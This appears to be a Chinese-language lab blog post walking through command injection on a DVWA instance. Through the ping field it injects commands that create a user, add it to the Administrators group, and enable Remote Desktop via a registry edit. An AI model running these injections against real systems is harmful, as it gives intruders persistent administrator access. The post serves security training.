命令注入攻擊

 命令注入攻擊


攻擊目標同上一篇 http://10.10.10.16/dvwa

檢視 Command Injection 輸入 127.0.0.1 如下

可以看到目標主機執行 ping 127.0.0.1 的結果輸出在頁面

可以得知該欄位輸入後會執行 ping [參數],表示是一個 command line 的執行連結



透過 command line 後面輸入 | 執行其他命令的方式來達到額外指令的方式

測試 | whoami 的指令可以執行成功如下,確認欄位沒有進行輸入驗證



先於目標主機創建一個帳號名稱為 chep

指令 | net user cehp /add,使用者成功創建如下圖



成功創建後查看使用者列表,指令 : | net user,確定使用者帳號 cehp 存在



將使用者帳號 cehp 加入到本機的 Administrators 群組

指令 : | net localgroup Administrators cehp /add,成功執行如下



接著一樣檢查本機 Administrators 群組成員

指令 : | net localgroup Administrators,帳號 cehp 已隸屬本機 Administrators 群組



對於 Windows 而言有帳號密碼後最簡單的方式就是透過遠端桌面連線

先查看遠端主機有否開啟 3389 RDP 遠端桌面連線

指令 : | netstat -an | findstr 3389,確認有開啟如下



直接遠端桌面 10.10.10.16 成功連線



如果目標主機沒有開啟遠端桌面連線服務的話,檢查後沒有 3389 RDP 服務



先測試遠端桌面連線,確定失敗(廢話,沒服務可以連才有鬼)




那就直接透過下列指令直接幫他開起遠端桌面服務即可

指令 : | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f



再 | netstat -an 一次可以看到服務已經開啟




留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(1)